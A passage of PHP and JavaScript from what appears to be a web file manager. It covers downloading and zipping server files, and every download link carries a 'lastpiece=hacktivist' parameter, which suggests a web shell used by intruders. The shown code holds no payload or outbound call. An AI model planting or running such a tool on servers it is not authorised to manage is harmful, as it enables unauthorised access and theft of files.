Component(paths[0]) + '&lastpiece=hacktivist';
        } else {
            // Multiple files -> zip first then download
            showToast('Multiple files selected. Compressing to ZIP for download...', 'info', 3000);
            fileActionRequest({file_action: 'compress_zip', paths: JSON.stringify(paths), target_dir: '<?php echo addslashes($currentDirectory); ?>', zip_name: 'download_' + Date.now() + '.zip'}, function(r) {
                if (r.ok && r.zip_path) {
                    showToast('Compressed. Starting download...', 'success', 3000, 'applepay');
                    setTimeout(function() { window.location.href = '?dl=' + encodeURIComponent(r.zip_path) + '&lastpiece=hacktivist'; }, 500);
                } else {
                    showToast('Compress failed: ' + (r.err || 'Unknown'), 'error'); playFailSound();
                }
            });
        }
    } else if (type === 'zip') {
        document.getElementById('zipFileName').value = 'archive_' + Date.now() + '.zi